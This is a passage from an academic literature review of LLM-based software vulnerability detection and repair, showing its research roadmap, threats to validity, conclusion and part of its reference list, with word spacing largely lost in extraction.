investigatetheunder-exploredpaths,whichmayincludecombinationsofunder-exploredmodules andwell-establishedonesorconsistsolelyofmultipleunder-exploredmodules.Finally,inthe thirdstage,bytransformingallunder-exploredmodulesintowell-understoodcomponentsand studyingvariousunder-exploredpathsandcombinations,researcherscansummarizetheirfindings andanalyzestrategiesforbetterdevelopingLLM-basedsolutions,ultimatelyleadingtothenew ,Vol.1,No.1,Article.Publicationdate:October2024.22 Zhouetal. generationofpowerfulLLM-basedvulnerabilitydetectionandrepairsolutions.Below,wedescribe thethreestagesindetail. Stage1:ExploringUnder-exploredModulesIndividually.Figure8highlightsseveralunder- exploredmodulesingreen,eachofferingexcitingpotentialfordiscovery.Weoutlinebelowsome promisingopportunitiesfordeeperinvestigationintotheseareas: • Opportunity1:CuratingHigh-qualityTestSetforVulnerabilityDetection.Theabsenceofahigh- qualityvulnerabilitydatasetposesasignificantobstacletovulnerabilitydetection.Whileobtain- ingfullycorrectlabelsforalargedatasetisexpensive,aviablesolutionistocurateahigh-quality testset(whichismuchsmallerthanthewholedataset)thatcanaccuratelyassessprogressin vulnerabilitydetection.Aneasyapproachforfutureworkistocombinethemanuallychecked vulnerabilitydatasamplesscatteredacrossseveralseparateresearchworks(e.g.,[19,35,48])to formahigh-qualitytestset.Futureworkscanthendoanempiricalstudytorecognizethereal progressinvulnerabilitydetectionwiththehigh-qualitytestset.Furthermore,thecommunity canmaintainalivinghigh-qualitytestsetbyaddingnewmanuallyverifieddatatoit.Thiscurated testsetcanserveasareliablebenchmarkforvulnerabilitydetection. • Opportunity 2: Repo-level Vulnerability Detection/Repair. Current vulnerability detection and repair techniques primarily focus on the function or line level. One key reason is the input lengthlimitations(512subtokens)ofthesmallLLMslikeCodeBERTandCodeT5,whichare predominantlyusedinexistingstudies.The512subtokenslimitationalignswellwiththefunction leveldatabutfacesdifficultyinscalinguptoclassesorrepositories.However,theemergenceof recentlargerLLMswithsignificantlyhigherinputlengthcapacities,suchasGPT-4(whichcan handle128ksubtokens),facilitatesmoreeffectiveprocessingofrepo-leveldata.Thispresentsan opportunityforfutureresearchtoexplorerepo-levelvulnerabilitydetection/repairbyleveraging theselargerLLMs.Forthisdirection,onerecentstudy[130]hasinitiallyexploredtherepo-level vulnerabilitydetectiontask.Specifically,itcomparedSASTtools(e.g.,CodeQL)withpopular orstate-of-the-artopen-sourceLLMs(e.g.,CodeLlama)fordetectingsoftwarevulnerabilities insoftwarerepositories.TheexperimentalresultsindicatedthatSASTtoolsachievelowvul- nerability detection rates with relatively low false positives, whereas LLMs can detect more vulnerabilitiesbuttendtosufferfromhighfalsepositiverates.Alongsidethisinitialeffort,there isconsiderablepotentialandopportunitiesforfurtherresearchinthisdirection. • Opportunity3:CustomizedLLMsforVulnerability.Currently,widelyusedLLMsinvulnerability detection/repairaregeneral-purposeLLMs(e.g.,CodeBERT,CodeT5,andGPT-3.5)thatdonot fullyexploitthewealthofopen-sourcevulnerabilitydata.Apromisingavenueisthedevelopment ofcustomizedLLMstailoredforvulnerabilitydata.Someinitialattemptsinthisdirectioninclude vulnGPT[98]andMicrosoftSecurityCopilot[61].However,asthesesolutionsareproprietary, theircustomizedLLMdetailsmaynotbefullydisclosed.Weadvocateforcollaborativeeffortsto developopen-sourcedandeffectivecustomizedLLMsforvulnerability. • Opportunity4:AdvancedLLMUsageandAdaptation.RegardingLLMsusages,beyondthetech- niquesobservedintheincludedstudies—suchasfine-tuning,promptengineering,andretrieval augmentation—thereexisttwomoreadvancedusagesofLLMs[62]thathavenotbeenexplored yetinvulnerabilitydetectionandrepair:1)LLMAgent:LLMscanserveasagentstodecompose complextasksintosmallercomponentsandemploymultipleLLMstoaddressthem[101];2) UsageofExternalTools:LLMscanutilizeexternaltoolssuchassearchengines,externaldatabases, andotherresourcestoenhancethem[77].RegardingdetailedLLMsadaptationtechniques,as illustrated in Fig.6 and Fig.7, the majority of proposed adaptations in this field are designed ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 23 forfine-tuningandpromptengineering.However,aplethoraofadvancedadaptationtechniques forretrievalaugmentationremainsunder-explored.Thesetechniquesincludeiterativeretrieval augmentation[86]andrecursiveretrievalaugmentation[96],andadaptiveretrievalaugmenta- tion[11].ResearcherscanconsiderusingthoseunexploredadvancedLLMusages/adaptationsin futureworks. • Opportunity5:SupportDeployment-readyFeatures.EffortscouldfocusonenhancingLLM-based solutionswithdeployment-readyfeatures,suchasuserinteractioncapabilitiesandseamless integrationintoexistingdeveloperworkflows.Thisincludesdevelopingintuitiveinterfacesthat
allowdeveloperstoprovidereal-timefeedbackonsuggestionsmadebytheLLMs,therebycreating amorecollaborativeenvironment.Additionally,implementingfunctionalitiesthatexplainthe reasoningbehindthemodel’srecommendationscanhelpdemystifythedecision-makingprocess, fosteringtrustandfacilitatingbetteradoptionamongdevelopers.Moreover,integratingthese solutionsintopopularIDEsorversioncontrolsystemscanstreamlinetheworkflow,making it easier for developers to utilize LLMs as part of their daily practices. By prioritizing these enhancements,LLM-basedtoolscansignificantlyimprovetheirusabilityandeffectivenessin real-worldscenarios,ultimatelycontributingtomorerobustvulnerabilitydetectionandrepair processes. Stage2:ExploringUnder-exploredPaths.Theunder-exploredpaths(mainlyrepresentedby graydottedlinesfromdatatodeployment)mayincludecombinationsofunder-exploredmodules withwell-establishedonesorconsistsolelyofmultipleunder-exploredmodules.Thisstagepresents numerousopportunities.Below,wefirsthighlightsomeexamplesofstudyingthesecombinations ofunder-exploredmodulesalongsidewell-establishedones: • OncethecommunitydevelopscustomizedLLMs,researcherscanapplywell-studiedfine-tuning orprompting-basedadaptationtechniquestoimprovefunction-levelorline-levelvulnerabil- itydetectionorrepair.Theseenhancedmodelscanfurtherbeextendedtosupportdeveloper interaction,creatingmorepracticalandintegratedsolutions. • Oncenewdatasetsareestablished—suchasthosecontainingmanuallyverifiedvulnerabilities and associated test cases—researchers can re-evaluate existing LLM methods to assess their effectivenessinvulnerabilitydetectionandrepair.Exploringvariouscombinationsofunder- exploredaspectsandwell-studiedapproachescanyieldvaluableinsightsandadvancements. • Researcherscanleveragegeneral-purposeLLMs(e.g.,CodeBERT,CodeT5,andGPT-3.5)todevelop repo-levelvulnerabilitydetectionandrepairtools,alsofacilitatinginteractionwithdevelopers. Therearealsomanyopportunitiesinpathsthatconsistsolelyofmultipleunder-exploredmodules. Forinstance,researcherscoulddesignarepo-levelvulnerabilitydetectionorrepairmethodusing customizedvulnerability-specificLLMsandenhanceitseffectivenessbyincorporatingLLMagent techniques.Finally,thetoolcanbeintegratedintoIDEs,leveragingLLMstoimproveinteraction capabilities. Stage 3: Summarizing Findings and Applying Them for Next-Generation LLM-based Solutions. In this most advanced stage, researchers are expected to transform various under- explored aspects into well-studied areas and investigate diverse under-explored paths. At this stage,theycansummarizetheirfindingsandanalyzestrategiesforimprovingthedevelopmentof LLM-basedsolutions.Byleveragingthisexperienceandknowledge,theymaypushtheboundaries ofwhatLLMscanachieveinvulnerabilitydetectionandrepairtonewheights. Ideally,by2030,followingtheroadmapillustratedinFigure8,thecommunitycandevelopa highlyeffectivemethodcapableofperformingline-level,method-level,class-level,andrepository- levelvulnerabilitydetectionandrepair,utilizinganexpert-annotatedbenchmarktoensureaccurate ,Vol.1,No.1,Article.Publicationdate:October2024.24 Zhouetal. evaluation.Furthermore,theidealsolutionshouldfacilitateseamlesscommunicationandcollab- orationwithdevelopers,achievinghighaccuracyandrobustnesswhileprovidingtrustworthy, expert-levelinsightsintoreal-worldvulnerabilities. 9 THREATSTOVALIDITY Thepotentialthreattovalidityistheriskofinadvertentlyexcludingrelevantstudiesduringthe literaturesearchandselectionphase.Incompletesummarizationofkeywordsforvulnerability detection/repairorvariedterminologiesofLLMsmayhavecausedrelevantresearchstudiestobe missedinourreview.Tomitigatethisrisk,weinitiallyperformedamanualselectionof17high- impactvenuesandextractedarelativelycomprehensivesetofstandardkeywordsfromrelevant paperswithinthesevenues.Inaddition,wefurtheraugmentedoursearchresultsbycombining automatedsearchwithforward-backwardsnowballing. 10 CONCLUSIONANDFUTUREWORK TheuseofLargeLanguageModels(LLMs)forvulnerabilitydetectionandrepairhasbeengarnering increasing attention. This paper presents a systematic literature review of 58 primary studies on LLMs for vulnerability detection and repair. This review begins by analyzing the types of LLMs used in primary studies, shedding light on researchers’ preferences for different LLMs. Subsequently,wecategorizedavarietyoftechniquesforadaptingLLMs.Throughouranalysis, thisreviewalsoidentifiesthelimitationsinthisfieldandproposesaresearchroadmapoutlining promisingavenuesforfutureexploration.Inthefuture,weplantobroadenthisliteraturereview by incorporating additional vulnerability-related tasks, such as vulnerability localization and vulnerabilityassessment. Acknowledgement.Thisresearch/projectissupportedbytheNationalResearchFoundation, underitsInvestigatorshipGrant(NRF-NRFI08-2022-0002).Anyopinions,findingsandconclusions orrecommendationsexpressedinthismaterialarethoseoftheauthor(s)anddonotreflectthe viewsofNationalResearchFoundation,Singapore. REFERENCES [1] ACMDigitalLibrary.https://dl.acm.org. [2] arXivDatabase.https://arxiv.org. [3] IEEEXploreDatabase.https://ieeexplore.ieee.org. [4] ScienceDirectDatabase.https://www.sciencedirect.com. [5] SpringerLinkDatabase.https://link.springer.com.
[6] WebofScienceDatabase.https://www.webofscience.com. [7] WielyDatabase.https://onlinelibrary.wiley.com. [8] Online Appendix for This Review. https://docs.google.com/document/d/18- UrkfH35CNMGRjjsDYZGK6L1aC9wP3GsKCtrIekcUQ/edit?usp=sharing,2024. [9] Ahmad,B.,Thakur,S.,Tan,B.,Karri,R.,andPearce,H. Fixinghardwaresecuritybugswithlargelanguage models.CoRRabs/2302.01215(2023). [10] Ahmad,W.U.,Chakraborty,S.,Ray,B.,andChang,K.-W.Unifiedpre-trainingforprogramunderstandingand generation.arXivpreprintarXiv:2103.06333(2021). [11] Asai,A.,Wu,Z.,Wang,Y.,Sil,A.,andHajishirzi,H.Self-rag:Learningtoretrieve,generate,andcritiquethrough self-reflection.arXivpreprintarXiv:2310.11511(2023). [12] Berabi,B.,Gronskiy,A.,Raychev,V.,Sivanrupan,G.,Chibotaru,V.,andVechev,M.T.DeepcodeAIfix:Fixing securityvulnerabilitieswithlargelanguagemodels.CoRRabs/2402.13291(2024). [13] Brown,T.,Mann,B.,Ryder,N.,Subbiah,M.,Kaplan,J.D.,Dhariwal,P.,Neelakantan,A.,Shyam,P.,Sastry, G.,Askell,A.,etal.Languagemodelsarefew-shotlearners.Advancesinneuralinformationprocessingsystems33 (2020),1877–1901. [14] Chakraborty,S.,Ahmed,T.,Ding,Y.,Devanbu,P.T.,andRay,B.Natgen:generativepre-trainingby"naturalizing" sourcecode.InProceedingsofthe30thACMJointEuropeanSoftwareEngineeringConferenceandSymposiumonthe ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 25 FoundationsofSoftwareEngineering,ESEC/FSE2022,Singapore,Singapore,November14-18,2022(2022),A.Roychoud- hury,C.Cadar,andM.Kim,Eds.,ACM,pp.18–30. [15] Chen,M.,Tworek,J.,Jun,H.,Yuan,Q.,Pinto,H.P.d.O.,Kaplan,J.,Edwards,H.,Burda,Y.,Joseph,N.,Brockman, G.,etal.Evaluatinglargelanguagemodelstrainedoncode.arXivpreprintarXiv:2107.03374(2021). [16] Chen,Y.,Ding,Z.,Alowain,L.,Chen,X.,andWagner,D.A.Diversevul:Anewvulnerablesourcecodedataset fordeeplearningbasedvulnerabilitydetection.InProceedingsofthe26thInternationalSymposiumonResearchin Attacks,IntrusionsandDefenses,RAID2023,HongKong,China,October16-18,2023(2023),ACM,pp.654–668. [17] Chen,Z.,Kommrusch,S.,andMonperrus,M.NeuraltransferlearningforrepairingsecurityvulnerabilitiesinC code.IEEETrans.SoftwareEng.49,1(2023),147–165. [18] Chi,J.,Qu,Y.,Liu,T.,Zheng,Q.,andYin,H.Seqtrans:Automaticvulnerabilityfixviasequencetosequencelearning. IEEETrans.SoftwareEng.49,2(2023),564–585. [19] Croft,R.,Babar,M.A.,andKholoosi,M.M.Dataqualityforsoftwarevulnerabilitydatasets.In45thIEEE/ACM InternationalConferenceonSoftwareEngineering,ICSE2023,Melbourne,Australia,May14-20,2023(2023),IEEE, pp.121–133. [20] Devlin,J.,Chang,M.-W.,Lee,K.,andToutanova,K. Bert:Pre-trainingofdeepbidirectionaltransformersfor languageunderstanding.arXivpreprintarXiv:1810.04805(2018). [21] Ding,Y.,Fu,Y.,Ibrahim,O.,Sitawarin,C.,Chen,X.,Alomair,B.,Wagner,D.A.,Ray,B.,andChen,Y.Vulnerability detectionwithcodelanguagemodels:Howfararewe?arXivpreprintarXiv:2403.18624(2024). [22] Du,X.,Zheng,G.,Wang,K.,Feng,J.,Deng,W.,Liu,M.,Chen,B.,Peng,X.,Ma,T.,andLou,Y.Vul-rag:Enhancing llm-basedvulnerabilitydetectionviaknowledge-levelRAG.CoRRabs/2406.11147(2024). [23] Feng,Z.,Guo,D.,Tang,D.,Duan,N.,Feng,X.,Gong,M.,Shou,L.,Qin,B.,Liu,T.,Jiang,D.,etal.Codebert:A pre-trainedmodelforprogrammingandnaturallanguages.arXivpreprintarXiv:2002.08155(2020). [24] Fried,D.,Aghajanyan,A.,Lin,J.,Wang,S.,Wallace,E.,Shi,F.,Zhong,R.,Yih,S.,Zettlemoyer,L.,andLewis, M.Incoder:Agenerativemodelforcodeinfillingandsynthesis.InTheEleventhInternationalConferenceonLearning Representations,ICLR2023,Kigali,Rwanda,May1-5,2023(2023),OpenReview.net. [25] Fu,M.,Nguyen,V.,Tantithamthavorn,C.,Phung,D.,andLe,T.Visiontransformer-inspiredautomatedvulnera- bilityrepair.ACMTransactionsonSoftwareEngineeringandMethodology(2024). [26] Fu,M.,andTantithamthavorn,C. Linevul:Atransformer-basedline-levelvulnerabilityprediction. In19th IEEE/ACMInternationalConferenceonMiningSoftwareRepositories,MSR2022,Pittsburgh,PA,USA,May23-24,2022 (2022),ACM,pp.608–620.
[27] Fu,M.,Tantithamthavorn,C.,Le,T.,Kume,Y.,Nguyen,V.,Phung,D.Q.,andGrundy,J.C. Aibughunter:A practicaltoolforpredicting,classifyingandrepairingsoftwarevulnerabilities.Empir.Softw.Eng.29,1(2024),4. [28] Fu,M.,Tantithamthavorn,C.,Le,T.,Nguyen,V.,andPhung,D.Q. Vulrepair:at5-basedautomatedsoftware vulnerabilityrepair. InProceedingsofthe30thACMJointEuropeanSoftwareEngineeringConferenceandSympo- siumontheFoundationsofSoftwareEngineering,ESEC/FSE2022,Singapore,Singapore,November14-18,2022(2022), A.Roychoudhury,C.Cadar,andM.Kim,Eds.,ACM,pp.935–947. [29] Fu,M.,Tantithamthavorn,C.,Nguyen,V.,andLe,T.Chatgptforvulnerabilitydetection,classification,andrepair: Howfararewe?APSEC(2023). [30] Ghaffarian,S.M.,andShahriari,H.R.Softwarevulnerabilityanalysisanddiscoveryusingmachine-learningand data-miningtechniques:Asurvey.ACMcomputingsurveys(CSUR)50,4(2017),1–36. [31] GitHub.Githubcopilot.https://copilot.github.com,2023. [32] Guo,D.,Lu,S.,Duan,N.,Wang,Y.,Zhou,M.,andYin,J. Unixcoder:Unifiedcross-modalpre-trainingforcode representation.InProceedingsofthe60thAnnualMeetingoftheAssociationforComputationalLinguistics(ACL)(2022), AssociationforComputationalLinguistics,pp.7212–7225. [33] Guo,D.,Ren,S.,Lu,S.,Feng,Z.,Tang,D.,Liu,S.,Zhou,L.,Duan,N.,Svyatkovskiy,A.,Fu,S.,etal.Graphcodebert: Pre-trainingcoderepresentationswithdataflow.arXivpreprintarXiv:2009.08366(2020). [34] Hanif,H.,andMaffeis,S.Vulberta:Simplifiedsourcecodepre-trainingforvulnerabilitydetection.InInternational JointConferenceonNeuralNetworks,IJCNN2022,Padua,Italy,July18-23,2022(2022),IEEE,pp.1–8. [35] He,J.,andVechev,M.Largelanguagemodelsforcode:Securityhardeningandadversarialtesting.InProceedingsof the2023ACMSIGSACConferenceonComputerandCommunicationsSecurity(2023),pp.1865–1879. [36] He,J.,Zhou,X.,Xu,B.,Zhang,T.,Kim,K.,Yang,Z.,Thung,F.,Irsan,I.C.,andLo,D.Representationlearningfor stackoverflowposts:Howfararewe?ACMTransactionsonSoftwareEngineeringandMethodology(2023). [37] Hou,X.,Zhao,Y.,Liu,Y.,Yang,Z.,Wang,K.,Li,L.,Luo,X.,Lo,D.,Grundy,J.C.,andWang,H.Largelanguage modelsforsoftwareengineering:Asystematicliteraturereview.ArXivabs/2308.10620(2023). [38] Islam,N.T.,Khoury,J.,Seong,A.,Parra,G.D.L.T.,Bou-Harb,E.,andNajafirad,P. Llm-poweredcode vulnerabilityrepairwithreinforcementlearningandsemanticreward.CoRRabs/2401.03374(2024). [39] Islam,N.T.,andNajafirad,P.Codesecurityvulnerabilityrepairusingreinforcementlearningwithlargelanguage ,Vol.1,No.1,Article.Publicationdate:October2024.26 Zhouetal. models.AAAIWorkshop(2024). [40] Jiang,M.,Liu,K.Z.,Zhong,M.,Schaeffer,R.,Ouyang,S.,Han,J.,andKoyejo,S.Investigatingdatacontamination forpre-traininglanguagemodels,2024. [41] Jiang,Z.,Sun,W.,Gu,X.,Wu,J.,Wen,T.,Hu,H.,andYan,M.DFEPT:dataflowembeddingforenhancingpre-trained modelbasedvulnerabilitydetection.InProceedingsofthe15thAsia-PacificSymposiumonInternetware,Internetware 2024,Macau,SAR,China,July24-26,2024(2024),H.Mei,J.Lv,A.Helal,X.Ma,S.Cheung,J.Zhang,andT.Zhang, Eds.,ACM. [42] Kanade,A.,Maniatis,P.,Balakrishnan,G.,andShi,K.Learningandevaluatingcontextualembeddingofsource code.InInternationalConferenceonMachineLearning(2019). [43] Khare,A.,Dutta,S.,Li,Z.,Solko-Breslin,A.,Alur,R.,andNaik,M.Understandingtheeffectivenessoflarge languagemodelsindetectingsecurityvulnerabilities.arXivpreprintarXiv:2311.16169(2023). [44] Kojima,T.,Gu,S.S.,Reid,M.,Matsuo,Y.,andIwasawa,Y. Largelanguagemodelsarezero-shotreasoners. In AdvancesinNeuralInformationProcessingSystems35:AnnualConferenceonNeuralInformationProcessingSystems 2022,NeurIPS2022,NewOrleans,LA,USA,November28-December9,2022(2022),S.Koyejo,S.Mohamed,A.Agarwal, D.Belgrave,K.Cho,andA.Oh,Eds. [45] Kuang,H.,Yang,F.,Zhang,L.,Tang,G.,andYang,L.Leveraginguser-definedidentifiersforcounterfactualdata generationinsourcecodevulnerabilitydetection. In23rdIEEEInternationalWorkingConferenceonSourceCode AnalysisandManipulation,SCAM2023,Bogotá,Colombia,October2-3,2023(2023),L.Moonen,C.D.Newman,and A.Gorla,Eds.,IEEE,pp.143–150. [46] Le,T.H.M.,Du,X.,andBabar,M.A.Arelatentvulnerabilitieshiddengemsforsoftwarevulnerabilityprediction?
anempiricalstudy. In21stIEEE/ACMInternationalConferenceonMiningSoftwareRepositories,MSR2024,Lisbon, Portugal,April15-16,2024(2024),D.Spinellis,A.Bacchelli,andE.Constantinou,Eds.,ACM,pp.716–727. [47] Lewis,P.S.H.,Perez,E.,Piktus,A.,Petroni,F.,Karpukhin,V.,Goyal,N.,Küttler,H.,Lewis,M.,Yih,W., Rocktäschel,T.,Riedel,S.,andKiela,D.Retrieval-augmentedgenerationforknowledge-intensiveNLPtasks.In AdvancesinNeuralInformationProcessingSystems33:AnnualConferenceonNeuralInformationProcessingSystems 2020,NeurIPS2020,December6-12,2020,virtual(2020),H.Larochelle,M.Ranzato,R.Hadsell,M.Balcan,andH.Lin, Eds. [48] Li,K.,Chen,S.,Fan,L.,Feng,R.,Liu,H.,Liu,C.,Liu,Y.,andChen,Y. Comparisonandevaluationonstatic applicationsecuritytesting(sast)toolsforjava.InProceedingsofthe31stACMJointEuropeanSoftwareEngineering ConferenceandSymposiumontheFoundationsofSoftwareEngineering(2023),pp.921–933. [49] Li,R.,Allal,L.B.,Zi,Y.,Muennighoff,N.,Kocetkov,D.,Mou,C.,Marone,M.,Akiki,C.,Li,J.,Chim,J.,Liu, Q.,Zheltonozhskii,E.,Zhuo,T.Y.,Wang,T.,Dehaene,O.,Davaadorj,M.,Lamy-Poirier,J.,Monteiro,J., Shliazhko,O.,Gontier,N.,Meade,N.,Zebaze,A.,Yee,M.-H.,Umapathi,L.K.,Zhu,J.,Lipkin,B.,Oblokulov, M.,Wang,Z.,Murthy,R.,Stillerman,J.,Patel,S.S.,Abulkhanov,D.,Zocca,M.,Dey,M.,Zhang,Z.,Fahmy, N.,Bhattacharyya,U.,Yu,W.,Singh,S.,Luccioni,S.,Villegas,P.,Kunakov,M.,Zhdanov,F.,Romero,M., Lee,T.,Timor,N.,Ding,J.,Schlesinger,C.,Schoelkopf,H.,Ebert,J.,Dao,T.,Mishra,M.,Gu,A.,Robinson,J., Anderson,C.J.,Dolan-Gavitt,B.,Contractor,D.,Reddy,S.,Fried,D.,Bahdanau,D.,Jernite,Y.,Ferrandis, C.M.,Hughes,S.M.,Wolf,T.,Guha,A.,vonWerra,L.,anddeVries,H.Starcoder:maythesourcebewithyou! ArXivabs/2305.06161(2023). [50] Li,Z.,Wang,N.,Zou,D.,Li,Y.,Zhang,R.,Xu,S.,Zhang,C.,andJin,H. Ontheeffectivenessoffunction- levelvulnerabilitydetectorsforinter-proceduralvulnerabilities.InProceedingsofthe46thIEEE/ACMInternational ConferenceonSoftwareEngineering,ICSE2024,Lisbon,Portugal,April14-20,2024(2024),ACM,pp.157:1–157:12. [51] Li,Z.,Wang,N.,Zou,D.,Li,Y.,Zhang,R.,Xu,S.,Zhang,C.,andJin,H. Ontheeffectivenessoffunction-level vulnerabilitydetectorsforinter-proceduralvulnerabilities.ICSE(2024). [52] Liang,J.T.,Yang,C.,andMyers,B.A.Alarge-scalesurveyontheusabilityofAIprogrammingassistants:Successes andchallenges. InProceedingsofthe46thIEEE/ACMInternationalConferenceonSoftwareEngineering,ICSE2024, Lisbon,Portugal,April14-20,2024(2024),ACM,pp.52:1–52:13. [53] Lin,G.,Wen,S.,Han,Q.-L.,Zhang,J.,andXiang,Y.Softwarevulnerabilitydetectionusingdeepneuralnetworks: asurvey.ProceedingsoftheIEEE108,10(2020),1825–1848. [54] Liu,Y.,Ott,M.,Goyal,N.,Du,J.,Joshi,M.,Chen,D.,Levy,O.,Lewis,M.,Zettlemoyer,L.,andStoyanov,V. Roberta:Arobustlyoptimizedbertpretrainingapproach.arXivpreprintarXiv:1907.11692(2019). [55] Liu,Z.,Liao,Q.,Gu,W.,andGao,C. SoftwarevulnerabilitydetectionwithGPTandin-contextlearning. In 8thInternationalConferenceonDataScienceinCyberspace,DSC2023,Hefei,China,August18-20,2023(2023),IEEE, pp.229–236. [56] Liu,Z.,Tang,Z.,Zhang,J.,Xia,X.,andYang,X.Pre-trainingbypredictingprogramdependenciesforvulnerability analysistasks.ICSE(2024). [57] Lo,D. Trustworthyandsynergisticartificialintelligenceforsoftwareengineering:Visionandroadmaps. CoRR ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 27 abs/2309.04142(2023). [58] Lu,S.,Guo,D.,Ren,S.,Huang,J.,Svyatkovskiy,A.,Blanco,A.,Clement,C.,Drain,D.,Jiang,D.,Tang,D., etal.Codexglue:Amachinelearningbenchmarkdatasetforcodeunderstandingandgeneration.arXivpreprint arXiv:2102.04664(2021). [59] MahbuburRahman,M.,Ceka,I.,Mao,C.,Chakraborty,S.,Ray,B.,andLe,W.Towardscausaldeeplearningfor vulnerabilitydetection.ICSE(2024). [60] Meta.Codellama:Openfoundationmodelsforcode.https://ai.meta.com/research/publications/code-llama-open- foundation-models-for-code/,2023.
[61] Microsoft.Microsoftcopilotforsecurity.https://microsoft.github.io/PartnerResources/skilling/microsoft-security- academy/microsoft-security-copilot,2024. [62] Minaee,S.,Mikolov,T.,Nikzad,N.,Chenaghlu,M.,Socher,R.,Amatriain,X.,andGao,J. Largelanguage models:Asurvey,2024. [63] Ni,C.,Shen,L.,Xu,X.,Yin,X.,andWang,S.Learning-basedmodelsforvulnerabilitydetection:Anextensivestudy. arXivpreprintarXiv:2408.07526(2024). [64] Ni,C.,Yin,X.,Yang,K.,Zhao,D.,Xing,Z.,andXia,X.Distinguishinglook-alikeinnocentandvulnerablecodeby subtlesemanticrepresentationlearningandexplanation. InProceedingsofthe31stACMJointEuropeanSoftware EngineeringConferenceandSymposiumontheFoundationsofSoftwareEngineering(2023),pp.1611–1622. [65] Nie,X.,Li,N.,Wang,K.,Wang,S.,Luo,X.,andWang,H.Understandingandtacklinglabelerrorsindeeplearning- basedvulnerabilitydetection(experiencepaper).InProceedingsofthe32ndACMSIGSOFTInternationalSymposium onSoftwareTestingandAnalysis,ISSTA2023,Seattle,WA,USA,July17-21,2023(2023),R.JustandG.Fraser,Eds., ACM,pp.52–63. [66] Nijkamp,E.,Hayashi,H.,Xiong,C.,Savarese,S.,andZhou,Y.Codegen2:Lessonsfortrainingllmsonprogramming andnaturallanguages.CoRRabs/2305.02309(2023). [67] Nijkamp,E.,Hayashi,H.,Xiong,C.,Savarese,S.,andZhou,Y.Codegen2:Lessonsfortrainingllmsonprogramming andnaturallanguages.arXivpreprintarXiv:2305.02309(2023). [68] Nijkamp,E.,Pang,B.,Hayashi,H.,Tu,L.,Wang,H.,Zhou,Y.,Savarese,S.,andXiong,C.Codegen:Anopenlarge languagemodelforcodewithmulti-turnprogramsynthesis.InTheEleventhInternationalConferenceonLearning Representations,ICLR2023,Kigali,Rwanda,May1-5,2023(2023),OpenReview.net. [69] Nong,Y.,Aldeen,M.,Cheng,L.,Hu,H.,Chen,F.,andCai,H. Chain-of-thoughtpromptingoflargelanguage modelsfordiscoveringandfixingsoftwarevulnerabilities.CoRRabs/2402.17230(2024). [70] Nong,Y.,Yang,H.,Cheng,L.,Hu,H.,andCai,H.Automatedsoftwarevulnerabilitypatchingusinglargelanguage models.arXivpreprintarXiv:2408.13597(2024). [71] OpenAI.Gpt-3.5.https://platform.openai.com/docs/models/gpt-3-5,2022. [72] OpenAI.Gpt-4technicalreport,2023. [73] Pan,S.,Luo,L.,Wang,Y.,Chen,C.,Wang,J.,andWu,X.Unifyinglargelanguagemodelsandknowledgegraphs:A roadmap.arXivpreprintarXiv:2306.08302(2023). [74] Pearce,H.,Tan,B.,Ahmad,B.,Karri,R.,andDolan-Gavitt,B.Examiningzero-shotvulnerabilityrepairwith largelanguagemodels.In2023IEEESymposiumonSecurityandPrivacy(SP)(2023),IEEE,pp.2339–2356. [75] Peng,T.,Chen,S.,Zhu,F.,Tang,J.,Liu,J.,andHu,X. Ptlvd:programslicingandtransformer-basedline-level vulnerabilitydetectionsystem.In23rdIEEEInternationalWorkingConferenceonSourceCodeAnalysisandManipulation, SCAM2023,Bogotá,Colombia,October2-3,2023(2023),L.Moonen,C.D.Newman,andA.Gorla,Eds.,IEEE,pp.162–173. [76] Purba,M.D.,Ghosh,A.,Radford,B.J.,andChu,B.Softwarevulnerabilitydetectionusinglargelanguagemodels. In34thIEEEInternationalSymposiumonSoftwareReliabilityEngineering,ISSRE2023-Workshops,Florence,Italy, October9-12,2023(2023),IEEE,pp.112–119. [77] Qin,Y.,Liang,S.,Ye,Y.,Zhu,K.,Yan,L.,Lu,Y.,Lin,Y.,Cong,X.,Tang,X.,Qian,B.,Zhao,S.,Hong,L.,Tian,R., Xie,R.,Zhou,J.,Gerstein,M.,Li,D.,Liu,Z.,andSun,M.Toolllm:Facilitatinglargelanguagemodelstomaster 16000+real-worldapis,2023. [78] Radford,A.,Wu,J.,Child,R.,Luan,D.,Amodei,D.,Sutskever,I.,etal. Languagemodelsareunsupervised multitasklearners.OpenAIblog1,8(2019),9. [79] Raffel,C.,Shazeer,N.,Roberts,A.,Lee,K.,Narang,S.,Matena,M.,Zhou,Y.,Li,W.,andLiu,P.J.Exploringthe limitsoftransferlearningwithaunifiedtext-to-texttransformer. TheJournalofMachineLearningResearch21,1 (2020),5485–5551. [80] Ren,S.,Guo,D.,Lu,S.,Zhou,L.,Liu,S.,Tang,D.,Sundaresan,N.,Zhou,M.,Blanco,A.,andMa,S.Codebleu:a methodforautomaticevaluationofcodesynthesis.CoRRabs/2009.10297(2020). [81] Risse,N.,andBöhme,M.Uncoveringthelimitsofmachinelearningforautomaticvulnerabilitydetection.In33rd USENIXSecuritySymposium,USENIXSecurity2024,Philadelphia,PA,USA,August14-16,2024(2024),D.Balzarottiand W.Xu,Eds.,USENIXAssociation.
,Vol.1,No.1,Article.Publicationdate:October2024.28 Zhouetal. [82] Schulman,J.,Wolski,F.,Dhariwal,P.,Radford,A.,andKlimov,O. Proximalpolicyoptimizationalgorithms. arXivpreprintarXiv:1707.06347(2017). [83] Sejfia,A.,Das,S.,Shafiq,S.,andMedvidovic,N.Towardimproveddeeplearning-basedvulnerabilitydetection.In Proceedingsofthe46thIEEE/ACMInternationalConferenceonSoftwareEngineering,ICSE2024,Lisbon,Portugal,April 14-20,2024(2024),ACM,pp.62:1–62:12. [84] Sejfia,A.,Das,S.,Shafiq,S.,andMedvidović,N.Towardimproveddeeplearning-basedvulnerabilitydetection.In Proceedingsofthe46thIEEE/ACMInternationalConferenceonSoftwareEngineering(2024),pp.1–12. [85] Shahriar,H.,andZulkernine,M.Mitigatingprogramsecurityvulnerabilities:Approachesandchallenges.ACM ComputingSurveys(CSUR)44,3(2012),1–46. [86] Shao,Z.,Gong,Y.,Shen,Y.,Huang,M.,Duan,N.,andChen,W.Enhancingretrieval-augmentedlargelanguage modelswithiterativeretrieval-generationsynergy.arXivpreprintarXiv:2305.15294(2023). [87] 